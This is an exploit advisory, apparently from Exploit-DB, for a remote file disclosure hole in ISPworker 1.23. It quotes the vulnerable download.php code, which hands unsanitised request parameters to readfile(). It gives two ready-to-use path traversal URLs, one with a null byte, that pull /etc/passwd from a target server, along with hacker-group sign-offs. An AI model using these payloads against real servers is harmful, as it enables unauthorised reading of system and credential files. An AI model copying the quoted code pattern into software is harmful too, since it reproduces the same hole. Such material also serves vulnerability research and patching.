ISPworker 1.23 - Remote File Disclosure

EDB-ID:

10262

CVE:

N/A


Author:

cr4wl3r

Type:

webapps


Platform:

Linux

Date:

2009-12-01


   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]



########################################################################

#ISPworker <= 1.23 Remote File Disclosure exploit

#Download Script      :  http://www.ispware.de/_files/ispworker-1.23.tar.gz

#Dork                 :  die("lamers attempt");  :P

########################################################################

#

#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php 

#

#       <?header('Content-type: '.$_REQUEST[type]);

#        header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');

#        readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);

#       ?>

#

#PoC  :  http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00

#        http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd

#

########################################################################

########################################################################

####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################

########################################################################

########################################################################



   [ Gorontalo / 2009 ]